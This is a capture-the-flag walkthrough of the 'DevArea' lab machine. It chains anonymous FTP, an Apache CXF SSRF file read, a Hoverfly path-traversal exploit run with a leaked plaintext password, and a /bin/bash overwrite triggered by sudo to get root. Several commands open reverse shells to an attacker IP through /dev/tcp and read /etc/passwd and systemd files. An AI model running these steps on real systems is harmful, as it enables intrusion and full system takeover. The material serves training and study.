DevArea is a Linux machine hosting multiple vulnerable services. Initial access is gained through anonymous FTP revealing a JAR file vulnerable to Apache CXF SSRF (CVE-2022-46364), which exposes Hoverfly credentials in systemd service files. The Hoverfly instance is vulnerable to path traversal (CVE-2025-54123), leading to remote code execution. Privilege escalation exploits a world-writable `/bin/bash` binary combined with a passwordless sudo rule, allowing arbitrary command execution as root.
nnmap -sVC 10.129.11.211 -p- --min-rate 1000 -Pn fish-3 | 0 (0.001s) < 01:38:12 01:41 [2/3]
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-29 01:38 +0300
Warning: 10.129.11.211 giving up on port because retransmission cap hit (10).
Nmap scan report for devarea.htb (10.129.11.211)
Host is up (0.16s latency).
Not shown: 61712 closed tcp ports (reset), 3817 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Sep 22 2025 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.16.144
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 83:13:6b:a1:9b:28:fd:bd:5d:2b:ee:03:be:9c:8d:82 (ECDSA)
|_ 256 0a:86:fa:65:d1:20:b4:3a:57:13:d1:1a:c2:de:52:78 (ED25519)
80/tcp open http Apache httpd 2.4.58
|_http-title: DevArea - Connect with Top Development Talent
8080/tcp open http Jetty 9.4.27.v20200227
|_http-title: Error 404 Not Found
8500/tcp open http Golang net/http server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 500 Internal Server Error
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Sat, 28 Mar 2026 22:40:50 GMT
| Content-Length: 64
| This is a proxy server. Does not respond to non-proxy requests.
| GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 500 Internal Server Error
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Sat, 28 Mar 2026 22:40:28 GMT
| Content-Length: 64
|_ This is a proxy server. Does not respond to non-proxy requests.
8888/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)


ftp -a 10.129.11.211

we can install syft + grype for jar analysis
curl -sSfL https://get.anchore.io/syft | sudo sh -s -- -b /usr/local/bin
curl -sSfL https://get.anchore.io/grype | sudo sh -s -- -b /usr/local/bin
# Step 1: Generate SBOM
syft target.jar -o json > sbom.json

# Step 2: Scan for vulns
grype sbom:sbom.json

check these critical vulnerabilities we find Apache CXF Server-Side Request Forgery vulnerability GHSA-x3x3-qwjq-8gj4
Severity: High (CVSS 9.8)
Component: Apache CXF
Versions Affected: < 3.4.10, < 3.5.5
Attack Vector: Network / No Auth Required
Description:
A SSRF vulnerability in Apache CXF’s FileDataSource and URLDataSource allows an attacker to perform unauthorized file and URL access on the server. An attacker can exploit Attachment objects in requests to access arbitrary files or URLs on the system.
Impact:
Remediation:
References:
python3 CVE-2022-46364.py --target https://devarea.htb:8080/employeeservice --ssrf-url 'file:///etc/passwd' --domain devarea.htb

check for stored credentials in Systemd
python3 CVE-2022-46364.py --target https://devarea.htb:8080/employeeservice --ssrf-url 'file:///etc/systemd/system/' --domain devarea.htb

we have hoverfly.service check that out and we get hardcoded credentials
python3 CVE-2022-46364.py --target https://devarea.htb:8080/employeeservice --ssrf-url 'file:///etc/systemd/system/hoverfly.service' --domain devarea.htb

now we can login into hoverfly with these credentials

checking the version we find it vulnerable to CVE-2025-54123
Severity: High (CVSS 7.5)
Component: Hoverfly
Versions Affected: < 1.10.4
Attack Vector: Network / No Auth Required
Description:
A path traversal vulnerability in Hoverfly’s file handling allows an attacker to read arbitrary files from the server’s filesystem. The vulnerability exists in the simulation import functionality where user-controlled file paths are not properly validated, enabling directory traversal attacks using sequences like ../.
Impact:
Remediation:
References:
using the poc we run it with credentials we have and we get a shell.
python3 CVE-2025-54123.py -t https://devarea.htb:8888 -u admin -p 'O7IJ27MyyXiU' -c '/usr/bin/bash -i >& /dev/tcp/10.10.16.144/9001 0>&1'



we can see that syswatch-monitor.service it calling a executable that is writable by everyone


we can modify /bin/bash to run the syswatch.sh as root to get shell as root
exec sh
killall -9 /bin/bash
cp /bin/bash /tmp/bash
cat > /bin/bash << 'EOF'
#!/tmp/bash
bash -i >& /dev/tcp/10.10.16.144/9002 0>&1 &
EOF
sudo /opt/syswatch/syswatch.sh --version && cp /tmp/bash /bin/bash

Vulnerability: World-writable /bin/bash combined with passwordless sudo rule
Sudo Rule: (root) NOPASSWD: /opt/syswatch/syswatch.sh
Impact: Arbitrary command execution as root
Exploitation Steps:
# Setup listener on attacker
nc -lvnp 9002
# On target machine
exec sh
killall -9 /bin/bash
cp /bin/bash /tmp/bash
cat > /bin/bash << 'EOF'
#!/tmp/bash
bash -i >& /dev/tcp/10.10.16.144/9002 0>&1 &
EOF
sudo /opt/syswatch/syswatch.sh --version && cp /tmp/bash /bin/bash
Attack Flow:
sh - Prevents killing our own session/bin/bash#!/bin/bash → executes our payload as rootWhy It Works:
/bin/bash has incorrect permissions (world-writable: 666 or 777)syswatch.sh uses #!/bin/bash shebang → invokes our malicious scriptRemediation:
chmod 755 /bin/bash/bin/*